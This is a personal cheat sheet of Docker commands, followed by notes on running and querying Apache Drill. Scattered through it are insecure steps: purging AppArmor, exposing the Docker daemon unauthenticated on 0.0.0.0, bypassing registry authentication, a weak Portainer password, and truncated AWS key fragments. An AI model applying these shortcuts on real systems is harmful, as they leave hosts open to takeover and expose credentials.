dive ${DOCKER_REGISTRY}/portal-production/jenkins-builder

## [docker scout](https://docs.docker.com/scout/)
export PATH=$HOME/.docker/cli-plugins:$PATH
source <(docker-scout completion bash)

export layers tag layers

docker save imagename build-layer1 build-layer2 build-layer3 > image-caching.tar
docker load -i image-caching.tar

export layers to filesystem

# https://github.com/larsks/undocker/
docker save busybox | undocker -vi -o busybox -l 

pull image from repository

docker pull <image name>
docker pull cc-artifactory.myserver.net/some-path/<image name>:<image version>

image can be found: https://hub.docker.com/ example of command: docker pull mysql

push image to repository

docker push cc-artifactory.myserver.net/some-path/<image name>:<image version>

copy images between registries

skopeo copy docker://quay.io/buildah/stable docker://registry.internal.company.com/buildah

show all local images

docker images --all
docker image list --format "table {{.ID}}\t{{.Repository}}\t{{.Tag}}\t{{.Size}}"
docker image list --format "{{.ID}}\t{{.Repository}}"

Run and Start


docker run -d --restart=unless-stopped {CONTAINER ID}
# docker update --restart=no {CONTAINER ID}
value description
no Do not automatically restart the container. (the default)
on-failure Restart the container if it exits due to an error, which manifests as a non-zero exit code.
always Always restart the container if it stops. If it is manually stopped, it is restarted only when Docker daemon restarts or the container itself is manually restarted. (See the second bullet listed in restart policy details)
unless-stopped Similar to always, except that when the container is stopped (manually or otherwise), it is not restarted even after Docker daemon restarts.

map volume ( map folder )

-v {host machine folder}:{internal folder into docker container}:{permission}
-v `pwd`:/home/root/host_folder:rw
-v $PWD:/home/root/host_folder:Z
-v /tmp:/home/root/tmp

check volumes

docker volume ls

map multiply ports to current host

-p {host machine port}:{internal docker machine port}
docker run -d -p 8030-8033:8030-8033/tcp  e02d9b40e89d
docker run -d -p 8040:8040/tcp  prom/prometheus 

run container in detached ( background ) mode, without console attachment to running process

  • --detach
  • -d=true
  • -d

run image with specific name

docker run --name my_specific_name {name of image}

run image with specific user ( when you have issue with rights for mounting external folders )

docker run --user root {name of image}

run image with current user ( when you use docker image as pre-installed software )

docker run --user $(id -u):$(id -g) {name of the image}

run container with empty entrypoint, without entrypoint

ENTRYPOINT []
docker run --entrypoint="" --interactive --tty image-name /bin/sh 

start stopped previously container

docker start {CONTAINER ID}

Connect containers

connecting containers via host port, host connection

# external data storage for Redis: --volume /docker/host/dir:/data
sudo docker run --publish 7001:6379 --detach redis
# ip a | grep docker -B 2 | grep inet | grep global
sudo docker run --interactive --tty redis redis-cli -h 172.17.0.1 -p 7001

connecting containers directly via link

sudo docker run --name my-redis-container --detach redis
sudo docker run --interactive --tty --name my-redis-cli --link my-redis-container:redis redis redis-cli -h redis -p 6379

connecting containers via network

docker network create some-network

docker run --network some-network --name my-redis -d redis
docker run --network some-network --interactive --tty redis redis-cli -h my-redis

share network for docker-compose

docker network create --driver bridge my-local
docker network inspect my-local
docker network rm my-local
version: '3'
services:
    ...

networks:
    default:
        external:
            name: heritage-local

host address

172.17.0.1

or with .bashrc: export DOCKER_GATEWAY_HOST=172.17.0.1

# docker-compose.yml
version: '3.7'

services:
  app:
    image: your-app:latest
    ports:
      - "8080:8080"
    environment:
      DB_UPSTREAM: http://${DOCKER_GATEWAY_HOST:-host.docker.internal}:3000

connecting containers via host, localhost connection, shares the host network stack and has access to the /etc/hosts for network communication, host as network share host network share localhost network

docker run --rm   --name postgres-docker -e POSTGRES_PASSWORD=docker -d -p 5432:5432 postgres
# --net=host 
# --network host 
docker run -it --rm --network="host" postgres psql -h 0.0.0.0 -U postgres

assign static hostname to container (map hostname)

  • create network
docker network create --subnet=172.18.0.0/16 docker.local.network
  • assign address with network
docker run --net docker.local.network --ip 172.18.0.100 --hostname hadoop-local --network-alias hadoop-docker -it {CONTAINER ID} /bin/bash
  • check network
docker inspect {CONTAINER ID} | grep -i NETWORK

network types

--network="bridge" : 
  'host': use the Docker host network stack
  'bridge': create a network stack on the default Docker bridge
  'none': no networking
  'container:<name|id>': reuse another container's network stack
  '<network-name>|<network-id>': connect to a user-defined network

mount folder, map folder, mount directory, map directory multiple directories

working_dir="/path/to/working/folder"
docker run --volume $working_dir:/work -p 6900-6910:5900-5910 --name my_own_container -it ubuntu:18.04 /bin/sh
# !!! path to the host folder should be absolute !!! attach current folder 
docker run --entrypoint="" --name airflow_custom_local --interactive --tty --publish 8080:8080 --volume `pwd`/logs:/opt/airflow/logs --volume `pwd`/dags:/opt/airflow/dags airflow_custom /bin/sh 

Volumes

create volume

docker volume create {volume name}

inspect volume, check volume, read data from volume, inspect data locally

docker volume inspect {volume name}
[
    {
        "CreatedAt": "2020-03-12T22:07:53+01:00",
        "Driver": "local",
        "Labels": null,
        "Mountpoint": "/var/snap/docker/common/var-lib-docker/volumes/cd72b76daf3c66de443c05dfde77090d5e5499e0f2a0024f9ae9246177b1b86e/_data",
        "Name": "cd72b76daf3c66de443c05dfde77090d5e5499e0f2a0024f9ae9246177b1b86e",
        "Options": null,
        "Scope": "local"
    }
]
# inspect Mountpoint
ls -la /var/snap/docker/common/var-lib-docker/volumes/cd72b76daf3c66de443c05dfde77090d5e5499e0f2a0024f9ae9246177b1b86e/_data

list of all volumes

docker volume ls

using volume

docker run {name of image} -v {volume name}:/folder/inside/container
docker run {name of image} -mount source={volume name},target=/folder/inside/container

Inspection

show all containers that are running

docker ps

show all containers ( running, stopped, paused )

docker ps -a

show container with filter, show container with format

# filter docker images by name 
# output format - names with commands (https://github.com/BrianBland/docker/edit/master/api/client/formatter/formatter.go)
docker ps -a --filter "name=redis-lab" --format "{{.Names}} {{.Command}}"
docker ps -a --filter "name=redis-lab" --format "{{.Names}} {{.Command}}"
docker ps -a --format "  {{.ID}} {{.Names}}"

join to executed container, connect to container, rsh, sh on container

docker attach {CONTAINER ID}
# docker exec --interactive --tty {CONTAINER ID} /bin/sh

with detached sequence

docker attach {CONTAINER ID} --detach-keys="ctrl-Z"

with translation of all signals ( detaching: ctrl-p & ctrl-q )

docker attach {CONTAINER ID} --sig-proxy=true

docker log of container, console output

docker logs --follow --tail all {CONTAINER ID}
docker logs --follow --tail 25 {CONTAINER ID}
docker logs {CONTAINER ID}
docker logs --since 10m {CONTAINER ID}
docker logs --since 2018-01-01T00:00:00 {CONTAINER ID}

show processes from container

docker top {CONTAINER ID}

# https://github.com/bcicen/ctop
# sudo apt-get install docker-ctop
ctop

run program inside container and attach to process

docker exec -it {CONTAINER ID} /bin/bash

show difference with original image

docker diff {CONTAINER ID}

show all layers command+size, reverse engineering of container, print dockerfile

docker history --no-trunc {CONTAINER ID}
docker image history --no-trunc {CONTAINER ID}

docker running image information

docker inspect
docker image inspect
docker inspect -f '{{.HostConfig.PortBindings}}' {CONTAINER ID}

debug information

docker --debug

or for file /etc/docker/daemon.json

{
  "debug": true
}
docker cp <src> <cont:dest>

save


docker save changed container commit changes fix container changes

docker run --entrypoint="" -it {IMAGE_ID} /bin/sh
# execute some commands like `apt install curl`....

make a changes and keep it running select another terminal window

docker ps
# select proper container_id 
docker commit {CONTAINER_ID} {NEW_IMAGE_NAME}

!!! be aware, in case of skipping entrypoint, in committed image with be no entrypoint too

container new name, rename container, container new tag

# change name of container
docker tag {IMAGE_ID} <TAG_NAME[:TAG VERSION]>
docker tag {TAG_1} {TAG_2}
# untag
docker rmi {TAG_NAME}

docker save - image with layers and history

docker save --output <output file name>.tar {CONTAINER ID}

docker export - container WITHOUT history, without layers

docker export --output <output file name>.tar {CONTAINER ID}

Load/Import/Read from file to image


load full image into 'images' - with all layers and history

docker load -i {filename of archive}

import full image into 'images' - like a basement

docker import {filename of archive}

Stop and Pause


wait until container will be stopped

docker wait {CONTAINER ID}

stop executing container

docker stop {CONTAINER ID}

stop restarted container, compose stop, stop autostart, stop restarting

docker update --restart=no {CONTAINER ID}
# send signal SIGTERM
docker stop {CONTAINER ID}

pause/unpause executing container

docker pause {CONTAINER ID}
docker unpause {CONTAINER ID}

kill executing container

# send signal SIGKILL
docker kill {CONTAINER ID}
# send signal to container
docker kill --signal=9 {CONTAINER ID}

leave executing container

just kill the terminal

Remove and Clean, docker cleanup


remove all containers

docker rm `docker ps -a | awk -F ' ' '{print $1}'`

remove image

docker rmi <IMAGE ID>
docker rmi --force <IMAGE ID>
# remove unused images
sudo docker rmi `sudo docker images | grep "<none>" | awk '{print $3}'`

remove volumes ( unused )

docker volume ls -qf dangling=true | xargs -r docker volume rm

cleanup docker

docker system prune -af --volumes
# clean only unused volumes
docker system prune -f --volumes

delete

docker network ls  
docker network ls | grep "bridge"   
docker network rm $(docker network ls | grep "bridge" | awk '/ / { print $1 }')

delete docker, remove docker, uninstall docker

sudo docker network ls

sudo apt remove docker.io
sudo rm -rf /etc/systemd/system/docker.service
sudo rm -rf /etc/systemd/system/docker.socket
rm /home/$USER/.docker/.buildNodeID
sudo rm -rf /var/lib/docker

Additional management

docker events real time

docker system events

disk usage infomration

docker system df

remove unused data, remove stopped containers

docker system prune
docker pull portainer/portainer
docker run -d -p 9000:9000 -v /var/run/docker.sock:/var/run/docker.sock portainer/portainer

login/pass: admin/12345678

installation issues

The following packages have unmet dependencies:
 docker-ce : Depends: libseccomp2 (>= 2.3.0) but 2.2.3-3ubuntu3 is to be installed
E: Unable to correct problems, you have held broken packages.

resolution:

sudo apt install docker-ce=17.03.0~ce-0~ubuntu-xenial

Error starting daemon: error initializing graphdriver: /var/lib/docker contains several valid graphdrivers: overlay2, aufs; Please cleanup or explicitly choose storage driver (-s <DRIVER>)
Failed to start Docker Application Container Engine.

resolution

sudo apt-get install linux-image-extra-$(uname -r) linux-image-extra-virtual
sudo modprobe aufs
sudo gedit /lib/systemd/system/docker.service &
ExecStart=/usr/bin/dockerd -H fd:// --storage-driver=aufs

possible issue with 'pull'

Error response from daemon: Get https://registry-1.docker.io/v2/: dial tcp: lookup registry-1.docker.io on 160.55.52.52:8080: no such host

build error

W: Failed to fetch http://archive.ubuntu.com/ubuntu/dists/xenial/InRelease  Could not resolve 'archive.ubuntu.com'
W: Failed to fetch http://archive.ubuntu.com/ubuntu/dists/xenial-updates/InRelease  Could not resolve 'archive.ubuntu.com'

need to add proxy into Dockerfile

ENV http_proxy http://user:[email protected]:8080
ENV https_proxy http://user:[email protected]:8080

Build

  • docker cache: docker build --no-cache
  • docker base image: FROM ...
  • docker ignore files - ignore files from build process: .dockerignore
  • docker build time argument docker build --build-arg KEY=VALUE
  • docker runtime variables docker run --env KEY=VALUE

build from file

docker build -t {name of my own image}:latest {name of docker file | . } --no-cache
docker build -t solr-4.10.3:latest . // Dockerfile into current folder
docker build --tag java-app-runner:latest --build-arg http_proxy=http://user:[email protected]:8080  --file /home/projects/current-task/mapr/Dockerfile .

build with parameters, build with proxy settings

build --build-arg app_name=k8s-ambassador
docker build --build-arg http_proxy=proxy.muc:8080 --build-arg https_proxy=proxy.muc:8080 .

build with parameters inside dockerfile

ARG app_name
ENV JAR=$app_name.jar
# bash command
# docker build --tag rviz-image --build-arg ROS_VERSION=latest .
# 
ARG ROS_VERSION
FROM cc-artifactory.ubsgroup.com/docker/ros:${ROS_VERSION}

dockerfile with pre-build two FROM section

# Build node app
FROM node:16 as build
WORKDIR /src
RUN yarn install --immutable
RUN yarn run web:build:prod

# start file service
FROM caddy:2.5.2-alpine
WORKDIR /src
COPY --from=build /src/web/.webpack ./
EXPOSE 80
CMD ["caddy", "file-server", "--listen", ":80"]

build useful commands

command description
FROM Sets the base image, starting image to build the container, must be first line
MAINTAINER Sets the author field of the generated images
RUN Execute commands in a new layer on top of the current image and commit the results
CMD Allowed only once (if many then last one takes effect)
LABEL Adds metadata to an image
EXPOSE Informs container runtime that the container listens on the specified network ports at runtime
ENV Sets an environment variable
ADD Copy new files, directories, or remote file URLs from into the filesystem of the container
COPY Copy new files or directories into the filesystem of the container
ENTRYPOINT Allows you to configure a container that will run as an executable
VOLUME Creates a mount point and marks it as holding externally mounted volumes from native host or other containers
USER Sets the username or UID to use when running the image
WORKDIR Sets the working directory for any RUN, CMD, ENTRYPOINT, COPY, ADD commands
ARG Defines a variable that users can pass at build-time to the builder using --build-arg
ONBUILD Adds an instruction to be executed later, when the image is used as the base for another build
STOPSIGNAL Sets the system call signal that will be sent to the container to exit

Use RUN instructions to build your image by adding layers Use ENTRYPOINT to CMD when building executable Docker image and you need a command always to be executed. ( ENTRYPOINT can be re-writed from command-line: docker run -d -p 80:80 --entrypoint /bin/sh alipne ) Use CMD if you need to provide extra default arguments that could be overwritten from command line when docker container runs. Use CMD if you need to provide default arguments that could be overwritten from command line when docker container runs.

push your container

  • docker login
  • docker tag / also possible notation: /:
  • docker push /
DOCKER_REGISTRY="default-image-registry.apps.vantage.org"
IMAGE_LOCAL="ab1023fb0ac8"
OC_PROJECT="stg-1"
DOCKER_IMAGE_LOCAL_REPO=local
DOCKER_IMAGE_LOCAL_TAG=drill_connector

sudo docker tag $IMAGE_LOCAL $DOCKER_REGISTRY/$OC_PROJECT/$DOCKER_LOCAL_REPO:$DOCKER_LOCAL_TAG
sudo docker push $DOCKER_REGISTRY/$OC_PROJECT/$DOCKER_LOCAL_REPO:$DOCKER_LOCAL_TAG

advices

  • for a starting points ( FROM ) using -alpine or -scratch images, for example: "FROM python:3.6.1-alpine"
  • Each line in a Dockerfile creates a new layer, and because of the layer cache, the lines that change more frequently, for example, adding source code to an image, should be listed near the bottom of the file.
  • CMD will be executed after COPY
  • microdnf - minimal package manager
FROM python:3.6.1-alpine
RUN pip install flask
CMD ["python","app.py"]
COPY app.py /app.py
  • create user and group, create group
RUN groupadd -g 2053 r-d-ubs-technical-user
RUN useradd -ms /bin/bash -m -u 2056 -g 2053 customer2description
# activate user
USER customer2description
  • for downloading external artifacts need to use ADD command, COPY vs ADD
# download file
ADD http://artifactory.com/sourcefile.txt  /destination/path/sourcefile.txt
# download and extract archive
ADD https://artifactory.com/source.file.tar.gz /temp

read labels from container, read container labels, LABEL commands from container

docker inspect  --format '{{ .Config.Labels }}' cc-artifactory.ubsroup.net/docker/ros-automation:latest

communication with dockerd via REST & Python & CLI

docker sdk rest api

docker_api_version=1.41
# get list of containers
curl --unix-socket /var/run/docker.sock http://localhost/v${docker_api_version}/containers/json
# start container by image id
docker_image_id=050db1833a9c
curl --unix-socket /var/run/docker.sock -X POST http://localhost/v${docker_api_version}/containers/${docker_image_id}/start

Examples

simple start

docker run -it ubuntu /bin/sh
docker exec -it high_mclean /bin/bash

docker with env variables

docker run --env http_proxy=$http_proxy --env https_proxy=$https_proxy --env no_proxy=$no_proxy -it ubuntu:18.04 /bin/bash

docker with local network

docker run -v /tmp:/home/root/tmp --net docker.local.network --ip 172.18.0.100 --hostname hadoop-local --network-alias hadoop-docker -t -i  -p  50075:50075/tcp  -p 50090:50090/tcp sequenceiq/hadoop-docker /etc/bootstrap.sh -bash

docker with extension rights

docker run --hostname=quickstart.cloudera --privileged=true -t -i -p 7180 4239cd2958c6 /usr/bin/docker-quickstart

MariaDB

MariaDB start in container

docker run --detach --env MYSQL_ROOT_PASSWORD=root --env MYSQL_USER=root --env MYSQL_PASSWORD=root --env MYSQL_DATABASE=technik_db --name golang_mysql --publish 3306:3306 mysql;

docker run --name mysql-container --volume /my/local/folder/with/data:/var/lib/mysql --volume /my/local/folder/with/init/scripts:/docker-entrypoint-initdb.d --publish 3306:3306 --env MYSQL_DATABASE=activitidb --env MYSQL_ROOT_PASSWORD=root --detach mariadb --character-set-server=utf8mb4 --collation-server=utf8mb4_unicode_ci

MariaDB sql dump creation:

docker exec mysql-container sh -c 'exec mysqldump --all-databases -uroot -p"$MYSQL_ROOT_PASSWORD"' > /some/path/on/your/host/all-databases.sql

MariaDB sql dump import

docker run --net=host -v /some/path/on/your/host:/sql -it arey/mysql-client --host=10.143.242.65 --port=3310 --user=root --password=example --database=files -e "source /sql/all-databases.sql"

docker compose

chmod +x docker-compose-Linux-x86_64
sudo mv docker-compose-Linux-x86_64 /usr/local/bin/docker-compose
sudo apt-get install  --only-upgrade docker

check installation from python

import docker
import compose

variables in compose file

  phpmyadmin:
    image: phpmyadmin/phpmyadmin
    # name of container for compose
    container_name: app_admin
    ports:
      - "8081:80"
    environment:
      - PMA_HOST=mysql
      - PMA_PORT=${MYSQL_PORT}
      - PMA_USER=${MYSQL_USER}
      - PMA_PASSWORD=${MYSQL_PASSWORD}
    depends_on: 
      - mariadb

and file .env in the same folder

MYSQL_USER=joomla
MYSQL_PASSWORD=joomla
MYSQL_PORT=3306
docker-compose config

dependecies inheritance

version: '3'


base-airflow-common:
  &airflow-common
  build:
    context: .
    dockerfile: .docker/airflow-init.Dockerfile
  env_file:
      - .docker/.env
  volumes:
    - ./airflow-dag/wondersign_airflow_shopify/dags:/opt/airflow/dags
    - ./logs:/opt/airflow/logs
  depends_on:
    redis:
      condition: service_healthy
    db_variant:
      condition: service_healthy


services:

  airflow-webserver:
    <<: *airflow-common
    command: webserver
    ports:
      - 8080:8080
    healthcheck:
      test: ["CMD", "curl", "--fail", "http://localhost:8080/health"]
      interval: 10s
      timeout: 10s
      retries: 5
    restart: always	

remove entry point

entrypoint:
    - php
    - -d
    - zend_extension=/usr/local/lib/php/xdebug.so
    - -d
    - memory_limit=-1
    - vendor/bin/phpunit

check memory limits inside container

# outside
docker stats <container_name>
# inside
cat /sys/fs/cgroup/memory/memory.limit_in_bytes
cat /sys/fs/cgroup/memory/memory.max_usage_in_bytes

start in detached mode, up and detach

docker-compose up -d

start with re-creating all containers

docker-compose up --force-recreate
# start without re-creation
docker-compose up --no-recreate

start compose with additional variables

docker-compose -f docker-compose.yaml build --force-rm --build-arg MY_LOCAL_VAR

start compose with multiply files

docker-compose -f docker-file1.yaml -f docker-file2.yaml -f docker-file3.yaml up

docker-compose find folder with image

default name of image contains name of the folder like a prefix ( but underscore and minus signs can be removed )

Issues

In file './docker-compose.yml' service 'version' doesn't have any configuration options.

solution:

  • check format of the docker-compose file
  • install docker-copmose respective your Docker version

ERROR: error while removing network: dockerairflow_default
docker ps
# dockerairflow_webserver_1 
# dockerairflow_postgres_1 

docker network disconnect --force dockerairflow_default dockerairflow_webserver_1 
docker network disconnect --force dockerairflow_default dockerairflow_postgres_1 
# docker network rm --force dockerairflow_default

sudo aa-status
sudo systemctl disable apparmor.service --now
sudo aa-status
sudo apt-get purge --auto-remove apparmor
sudo service docker restart
docker system prune --all --volumes

Docker hack docker change files docker volumes location manual volume edit

docker volume inspect
# ls /var/lib/docker/volumes/4a6b2fa5a102985d377e545d6cb8648ed4f80da2ae835a1412eb02b9e0c03a52/_data
docker image inspect puckel/docker-airflow:1.10.9
# find "UpperDir", "LowerDir"
# ls /var/lib/docker/overlay2/97d76c31dd4907544b7357c3904853f9ceb3c755a5dedd933fee44491d9ec900/diff
vim /var/lib/docker/overlay2/97d76c31dd4907544b7357c3904853f9ceb3c755a5dedd933fee44491d9ec900/diff/usr/local/airflow/airflow.cfg

Docker swarm

gossip protocol swarm overview

init 'manager' node

docker swarm init --advertise-addr eth0

you will see invitation to add 'worker' node like

docker swarm join --token SWMTKN-1-3p93jlhx2hx9wif8xphl6e47c5ukwz12a00na81g7h0uopk6he-6xof1chqhjuor7hkn65ggjw1p 192.168.0.18:2377

to show token again

docker swarm join-token worker
docker swarm join-token manager

amount of managers:

  • Three manager nodes tolerate one node failure.
  • Five manager nodes tolerate two node failures.
  • Seven manager nodes tolerate three node failure amount of worker nodes - hundreds, thousands!!!

to leave docker cluster

docker swarm leave

to print amount of nodes into cluster

docker node ls
docker node inspect {node name}

create service ( for manager only )

docker service create --detach=true --name nginx1 --publish 80:80  --mount source=/etc/hostname,target=/usr/share/nginx/html/index.html,type=bind,ro nginx:1.12
  • request to each node will be routed to routing mesh
  • each docker container on each node will have own mount point ( you should see name of different hosts from previous example )

inspect services

docker service ls

inspect service

docker service ps {service name}

update service, change service attributes

docker service update --replicas=5 --detach=true {service name}
docker service update --image nginx:1.13 --detach=true nginx1
  • store desire state into internal storage
  • swarm recognized diff between desired and current state
  • tasks will be executed according diff

service log

log will be aggregated into one place and can be shown

docker service log

docker pause

docker pause {container name}
docker unpause {container name}

routing mesh effect

The routing mesh built into Docker Swarm means that any port that is published at the service level will be exposed on every node in the swarm. Requests to a published service port will be automatically routed to a container of the service that is running in the swarm.

docker daemon

## start docker daemon process
sudo dockerd 
# start in debug mode
sudo dockerd -D 
# start in listening mode
sudo dockerd -H 0.0.0.0:5555 

# using client with connection to remove docker daemon
docker -H 127.0.0.1:5555 ps

issues

docker image contain your local proxy credentials, remove credentials from docker container

container that you built locally contains your proxy credentials

# execution inside container
docker exec -it {container name} /bin/sh
env
# showing your credentials

solution

  • remove your credentials from file ~/.docker/config.json
{
 { proxies:{
     default: {httpProxy: "your value"}
   }
  }
}
  • build container with "--build-arg"
docker build \
--tag $BUILD_IMAGE_NAME  \
--build-arg http_proxy=$http_proxy \
--build-arg https_proxy=$https_proxy \
--build-arg no_proxy=$no_proxy \
.

docker login

Error response from daemon: Get https://docker-registry-default.dplapps.adv.org/v2/: x509: certificate signed by unknown authority
  • solution1 - skip authentication change file ~/.docker/config.json
...
	"auths": {
		"docker-registry-default.dplapps.adv.org": {},
		"https://docker-registry-default.dplapps.adv.org": {}
	},
...
  • solution2 - authentication
url_to_registry="docker-registry-default.simapps.advant.org"
sudo mkdir -p "/etc/docker/certs.d/$url_to_registry"
sudo cp certificate.crt /etc/docker/certs.d/$url_to_registry

docker login -u login_user -p `oc whoami -t` $url_to_registry

docker push, docker pull

authentication required

solution before 'docker login' need change file ~/.docker/config.json remove next block

    "credsStore": "secretservice"

docker instance issue

#apt install software-properties-common
Reading package lists... Done
Building dependency tree       
Reading state information... Done
E: Unable to locate package software-properties-common

solution need to execute 'update' before new package installation

apt update

and also helpful

apt install -y software-properties-common

docker build command issue

issue

FROM cc.ubsgroup.net/docker/builder
RUN mkdir /workspace
COPY dist/scenario_service.pex /workspace/scenario_service.pex
WORKDIR /workspace
docker build -t local-scenario --file Dockerfile-scenario-file .
# COPY/ADD failed: stat /var/lib/docker/tmp/docker-builder905175157/scenario_service.pex: no such file or directory

but file exists and present in proper place

solution 1 check your .dockerignore file for ignoring your "dist" or even worse "*" files :

# ignore all files
*

solution 2

FROM cc.ubsgroup.net/docker/builder
RUN mkdir /workspace
COPY scenario_service.pex /workspace/scenario_service.pex
WORKDIR /workspace
FULL_PATH="/home/projects/adp"
DOCKER_FILE="Dockerfile-scenario"
BUILD_SUBFOLDER="dist"
IMAGE_NAME="local-scenario"
docker build -t $IMAGE_NAME --file $FULL_PATH/$DOCKER_FILE $FULL_PATH/$BUILD_SUBFOLDER

docker remove volume issue

Error response from daemon: remove typo3_db_data: volume is in use 
docker system prune -af --volumes
docker volume rm typo3_db_data
sudo apt install podman

Drill cheat sheet

official doc

Architecture

components, phases

Components

  • Drill client ( connects to a Foreman, submits SQL statements, and receives results )
  • Foreman ( DrillBit server selected to maintain your session )
  • worker Drillbit servers ( do the actual work of running your query )
  • ZooKeeper server ( which coordinates the Drillbits within the Drill cluster and keep configuration )

necessary to register of all Drillbit servers

LifeCycle

  1. Parse the SQL statement into an internal parse tree ( Apache Calcite )

check sql query

  1. Perform semantic analysis on the parse tree by resolving names the selected data‐ base, against the schema (set of tables) in that database ( Apache Calcite )

check "database/table" names ( not columns, not columns types, schema-on-read system !!! )

  1. Convert the SQL parse tree into a logical plan, which can be thought of as a block diagram of the major operations needed to perform the given query. ( Apache Calcite )
  2. Convert the logical plan into a physical plan by performing a cost-based optimi‐ zation step that looks for the most efficient way to execute the logical plan.

Drill Web Console -> QueryProfile

  1. Convert the physical plan into an execution plan by determining how to distrib‐ ute work across the available worker Drillbits.
  2. Distribution

Major fragment - set of operators that can be done without exchange between DrillBits and grouped into a thread Minor fragment - slice of Major Fragment ( for instance reading one file from folder ), distribution unit Data affinity - place minor fragment to the same node where is data placed ( HDFS/MapR, where compute and storage are separate, like cloud - randomly )

  1. Collect all results (Minor fragments) on Foreman, provide results to client

start embedded

# install drill 
## https://drill.apache.org/download/
mkdir /home/projects/drill
cd /home/projects/drill
curl -L 'https://www.apache.org/dyn/closer.lua?filename=drill/drill-1.19.0/apache-drill-1.19.0.tar.gz&action=download' | tar -vxzf -

or

sudo apt-get install default-jdk
curl -o apache-drill-1.6.0.tar.gz http://apache.mesi.com.ar/drill/drill-1.6.0/apache-drill-1.6.0.tar.gz
tar xvfz apache-drill-1.6.0.tar.gz
cd apache-drill-1.6.0
# start drill locally
cd /home/projects/drill
# apache-drill-1.19.0/bin/sqlline -u jdbc:drill:zk=local
./apache-drill-1.19.0/bin/drill-embedded

# x-www-browser http://localhost:8047 &

start docker

docker run -it --name drill-1.19.0 -p 8047:8047 -p 31010:31010 -v /home/projects/temp/drill/conf:/opt/drill/conf  -v /home/projects/tempdiff-ko:/host_folder  apache/drill:1.19.0 
# docker stop drill-1.19.0
# docker ps -a | awk '{print $1}' | xargs docker rm {}
x-www-browser http://localhost:8047
x-www-browser http://localhost:8047/storage/dfs

## connect to drill cli
/opt/drill/bin/drill-embedded -u "jdbc:drill:drillbit=127.0.0.1"
# !help
# SELECT version FROM sys.version;

## logs
docker logs drill-1.19.0

cd /opt/drill/conf
cd /opt/drill/bin

configuration before start

(skip for embedded ) create /home/projects/temp/drill-override.conf

drill.exec: {
  cluster-id: "drillbits1",
  zk.connect: "localhost:2181"
}

local filesystem dfs

  "type": "file",
  "connection": "file:///",
  "workspaces": {
    "json_files": {
      "location": "/host_folder",
      "writable": false,
      "defaultInputFormat": "json",
      "allowAccessOutsideWorkspace": false
    },
    "tmp": {
      "location": "/tmp",
      "writable": true,
      "defaultInputFormat": null,
      "allowAccessOutsideWorkspace": false
    },
    "root": {
      "location": "/",
      "writable": false,
      "defaultInputFormat": null,
      "allowAccessOutsideWorkspace": false
    }
  },

Error text: Current default schema: No default schema selected

check your folder for existence ( maybe you haven't mapped in your docker container )

SHOW SCHEMAS;
SELECT * FROM sys.boot;
use dfs;

configuration in file: storage-plugins-override.conf

# This file involves storage plugins configs, which can be updated on the Drill start-up.
# This file is in HOCON format, see https://github.com/typesafehub/config/blob/master/HOCON.md for more information.
"storage": {
  dfs: {
    type: "file",
    connection: "file:///",
    workspaces: {
	    "wondersign": {
	      "location": "/home/projects/wondersign",
	      "writable": false,
	      "defaultInputFormat": "json",
	      "allowAccessOutsideWorkspace": false
   	 },    
    },
    formats: {
      "parquet": {
        "type": "parquet"
      },
      "json": {
      	"type": "json"
	extensions: [""],
      }
    },
    enabled: true
  }
}

s3 storage create storage: Storage->S3->Update

{
  "type": "file",
  "connection": "s3a://wond.../",
  "config": {
    "fs.s3a.secret.key": "nqGApjHh...",
    "fs.s3a.access.key": "AKIA6LW...",
    "fs.s3a.endpoint": "s3.us-east-1.amazonaws.com",
    "fs.s3a.impl.disable.cache":"true"
  },
<property>
    <name>fs.s3a.endpoint</name>
    <value>s3.REGION.amazonaws.com</value>
</property>
SELECT filepath, filename, sku FROM dfs.json_files.`/*` where sku is not null;

http://drill.apache.org/docs/s3-storage-plugin/ vim apache-drill-1.19.0/conf/core-site.xml

<configuration>
       <property>
           <name>fs.s3a.access.key</name>
           <value>AKIA6L...</value>
       </property>
       <property>
           <name>fs.s3a.secret.key</name>
           <value>nqGApjHh....</value>
       </property>
       <property>
           <name>fs.s3a.endpoint</name>
           <value>us-east-1</value>
       </property>
       <property>
           <name>fs.s3a.endpoint</name>
           <value>s3.REGION.amazonaws.com</value>
       </property>  
</configuration>  

configuration after start

plugin configuration: https://drill.apache.org/docs/s3-storage-plugin/

s3 configuration: Storage->S3->Update

http://localhost:8047/storage > s3 > Update (check below) > Enable

  "connection": "s3a://bucket_name",
  "config": {
    "fs.s3a.secret.key": "nqGApjHh2i...",
    "fs.s3a.access.key": "AKIA6LWYA...",
    "fs.s3a.endpoint": "us-east-1"
  },

should appear in "Enabled Storage Plugins"

filesystem configuration dfs configuration

workspaces-> root -> location
> enter full path to filesystem

connect to existing on MapR

# login
maprlogin password
echo $CLUSTER_PASSWORD | maprlogin password -user $CLUSTER_USER
export MAPR_TICKETFILE_LOCATION=$(maprlogin print | grep "keyfile" | awk '{print $3}')

# open drill
/opt/mapr/drill/drill-1.14.0/bin/sqlline -u "jdbc:drill:drillbit=ubs000103.vantagedp.com:31010;auth=MAPRSASL"

drill shell

# start recording console to file, write output
!record out.txt
# stop recording
record

drill querying data

-- execute it first
show databases; -- show schemas;
--------------------------------------------
select sessionId, isReprocessable from dfs.`/mapr/dp.prod.zurich/vantage/data/store/processed/0171eabfceff/reprocessable/part-00000-63dbcc0d1bed-c000.snappy.parquet`;
-- or even 
select sessionId, isReprocessable from dfs.`/mapr/dp.prod.zurich/vantage/data/store/processed/*/*/part-00000-63dbcc0d1bed-c000.snappy.parquet`;
-- with functions
to_char(to_timestamp(my_column), 'yyyy-MM-dd HH:mm:ss')
to_number(concat('0', mycolumn),'#')

-- local filesystem
SELECT filepath, filename, sku FROM dfs.`/home/projects/dataset/kaggle-data-01` where sku is not null;
SELECT filepath, filename, sku FROM dfs.root.`/kaggle-data-01` where sku is not null

SELECT filepath, filename, t.version, t.car_info.boardnet_version catinfo FROM dfs.root.`/file_infos` t;
SELECT t.row_data.start_time start_time, t.row_data.end_time end_time FROM ( SELECT flatten(file_info) AS row_data from dfs.root.`/file_infos/765f3c13-6c57-4400-acee-0177ca43610b/Metadata/file_info.json` ) AS t;

-- local file system complex query with inner!!! join
SELECT hvl.startTime, hvl.endTime, hvl.labelValueDouble, hvl2.labelValueDouble 
FROM dfs.`/vantage/data/store/95933/acfb-01747cefa4a9/single_labels/host_vehicle_latitude` hvl INNER JOIN dfs.`/vantage/data/store/95933/acfb-01747cefa4a9/single_labels/host_vehicle_longitude` hvl2
ON hvl.startTime = hvl2.startTime
WHERE hvl.startTime >= 1599823156000000000 AND hvl.startTime <= 1599824357080000000

!!! important: you should avoid colon ':' symbol in path ( explicitly or implicitly with asterix )

drill http

# check status
